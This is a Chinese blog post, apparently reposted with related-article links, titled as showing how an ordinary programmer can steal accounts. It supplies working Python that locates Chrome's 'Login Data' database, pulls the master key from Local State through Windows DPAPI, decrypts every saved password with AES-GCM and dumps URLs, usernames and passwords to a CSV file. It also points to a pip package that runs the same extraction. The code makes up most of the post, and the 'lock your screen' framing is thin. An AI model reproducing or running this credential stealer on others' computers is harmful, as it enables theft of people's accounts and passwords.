盗号不是只有黑客才能到,一枚普通的Python程序员也可以!
前言
很多人觉得盗号都很牛逼,很厉害,这肯定是一枚黑客程序员,那么事实真是如此吗?
其实到要弄到账号密码很简单,一般很多人在学校图书馆喜欢用电脑占座(以古度今,我好像好多年没去过学校图书馆了),而且出去的时候经常不锁屏,为了让大家养成良好的习惯,我来带大家写个小程序吧,无需输入任何密码就可以快速获取你存储在电脑浏览器中的所有账号和密码,算是通过实践出真知来给大家提个醒了~当然现在盗号啥的也并没啥卵用,以前我上次初中那会,去黑网吧玩,那时候还是玩的DNF刷一夜能得一点金币,结果第二天去的时候就一个剑魂上面留了把木棍!我相信很多男生应该和我一样有过相同的经历把!所以今天给大家算是提个醒把!
编辑
开发工具
Python版本:3.7.8
相关模块:
pikachupytools模块;
pycryptodome模块;
以及一些python自带的模块。
原理简介
众所周知,我们的浏览器里一般存储了很多我们访问过的网站的账号和密码:
编辑
一般情况下,查看这些密码是需要输入电脑的开机密码的。但是事实上,我们也可以通过其他方式直接查看这些账号密码。例如谷歌浏览器里保存账号密码的数据库文件默认路径为:
os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Default\Login Data'
我们可以通过读取该文件获得对应的账号密码:
'''读取数据库数据'''
def readdb(self, dbpath, master_key):sql = 'SELECT origin_url, username_value, password_value, date_created, date_last_used FROM logins;'client = sqlite3.connect(dbpath)cursor = client.cursor()with open(self.savename, 'a', newline='', encoding='utf-8-sig') as csv_file:cursor.execute(sql)csv_writer = csv.writer(csv_file, dialect=('excel'))if not self.write_heads_flag:csv_writer.writerow(self.csv_heads)self.write_heads_flag = Trueinfo = []for row in cursor.fetchall():for idx in range(len(self.csv_heads)):if isinstance(row[idx], bytes):info.append(self.decrypt(row[idx], master_key))else:info.append(row[idx])csv_writer.writerow(info)info = []cursor.close()client.close()
其中密码是加密之后的结果,打印出来大概是这样子的:
编辑
但是解密其实也很简单,通过网上的资料可以知道,我们只需要获得key值:
'''获得master key'''
def getmasterkey(self, local_state_path):import win32cryptwith open(os.environ['USERPROFILE'] + os.sep + local_state_path, 'r', encoding='utf-8') as fp:local_state = fp.read()local_state = json.loads(local_state)master_key = base64.b64decode(local_state['os_crypt']['encrypted_key'])master_key = master_key[5:]master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]return master_key
然后根据key值进行解码就行了:
'''解码'''
def decrypt(self, value, master_key):print(value)if value[:3] == b'v10':from Crypto.Cipher import AESiv, payload = value[3:15], value[15:]cipher = AES.new(master_key, AES.MODE_GCM, iv)decrypted_value = cipher.decrypt(payload)decrypted_value = decrypted_value[:-16].decode()else:import win32cryptdecrypted_value = win32crypt.CryptUnprotectData(value)[1].decode()return decrypted_value
解码之后的运行效果结果如下:
编辑
获得的结果默认保存在results.csv中,截图如下:
编辑
ok,大功告成啦,完整源代码详见相关文件。
想要快速测试的小伙伴只需要pip安装一下pikachupytools包:
pip install pikachupytools --upgrade
然后简单写几行代码就能调用运行了:
from pytools import pytools
#关注公众号:Python源码 领取完整代码tool_client = pytools.pytools()
tool_client.execute('decryptbrowser')
是不是非常简单,如果你是什么都不懂得小白,那确实男上加男!哈哈哈
盗号不是只有黑客才能到,一枚普通的Python程序员也可以!相关推荐
- python程序员工作怎样-怎样才能成为一名Python程序员
随着互联网的不断发展,从事IT行的的人越来越多,近几年用Python编程的程序员更是十分火爆,有些人是看中Python语言的优势,有些人是看中Python程序员的人才缺口,为将来的就业和职业发展做好准 ...
- python程序员搞笑段子_程序员才能看得懂的段子,内含表情包,吃饭的时候别点!...
原标题:程序员才能看得懂的段子,内含表情包,吃饭的时候别点! 很多网友都认为程序员必定是非常古板,整天只会敲键盘的码农.其实这种看法是非常片面的.真正优秀的程序员,不仅精通程序的编写,还是某些领域的专 ...
- python黑客库长安十二时辰 更新_程序员爬取 3 万条评论,《长安十二时辰》槽点大揭秘!...
该剧总体评价如何? 优酷给<长安十二时辰>打出了8.8的高分(首播时为9.0分).该剧在豆瓣.IMDB.时光网等平台分别收获了8.6.8.5.8.4分,这足以说明该剧总体评价还是不错的. ...
- python程序员加班多吗_程序员加班严重,如何才能不加班
毕竟加班不是生活的常态,新人程序员们也不必太过担心,一般的大型IT公司都有严格的工作休息制度,大部分情况是不加班的.只有项目很赶的时候会加班,而且加班也只是开发加班.加班几个小时是常态,通宵加班几年说 ...
- 单位怎么发年终奖才能合理避税,用Python程序实现
# -*- coding: utf-8 -*- def get_tax(x, is_year =False):if(is_year):p =x/12.else:p =xif(p<=1500):r ...
- 只有程序员才能看懂的幽默:程序员最讨厌康熙的哪个儿子
关注偶,领取超多学习资料. 1.老婆给当程序员的老公打电话:下班顺路买十个包子,如果看到卖西瓜的,买一个.当晚老公手捧一个包子进了家门-老婆怒道:你怎么只买一个包子?!老公甚恐,喃喃道:因为我真看到卖 ...
- 一本建立程序员(其它从业者)世界观、价值观和人生观的书——《黑客与画家》读书笔记
<黑客与画家>读书笔记 这是一本建立程序员世界观.价值观和人生观的书 阅读提示 作者简介 创业哲学 黑客的定义 全书内容一览 重要语句摘抄 第一部分(第1章--第4章)程序员的世界观 读后 ...
- GitHub告急!黑客威胁程序员不交钱就删库
作者 | 伍杏玲 出品 | CSDN(ID:CSDNnews) 5月3日,当中国程序员正愉快地过五一节时,国外程序员突然发现自己GitHub上的代码不翼而飞!自己的GitHub一秒变成悬疑片现场,不仅 ...
- 我是一名黑客我也是一名程序员
黑客(大陆和香港:黑客:台湾:骇客,英文:Hacker),通常是指对计算机科学.编程和设计方面具高度理解的人.在许多黑客类型电影被大家所熟知后,一些编程崇拜者便将成为一名黑客当成了自己的奋斗目标. 著 ...
最新文章
- 使用Silverlight3中的DataPager实现服务器端分页
- The Bottom of a Graph Poj 2553
- ServletContext(核心内容)
- linux 下安装maven
- 团队开发里频繁使用 git rebase 来保持树的整洁好吗?
- sqlite配置选项
- 模拟电子技术基础 思维导图
- ps换证件照背景颜色
- html 两个表合并,html如何合并表格
- ubuntu 安装teamviewer
- 基于hexo搭建github的个人静态博客
- Redhat 7.9安装db2 11.1.4.6 DBT3514错误
- 大数据产业到底是机遇还是陷阱?
- 计算机专业课题 结题报告,《有效技能研究与实践》课题结题报告
- NOIP 2015 d1t2 信息传递
- 字符集问题的初步探讨
- 公需科目2020快速学习_2021公需科目快速学习方法
- 拼多多开店做些什么有什么要求?开店的流程是什么?
- 【大学物理·静止电荷的电场】电容器的电容
- 套接字编程-TCP网络编程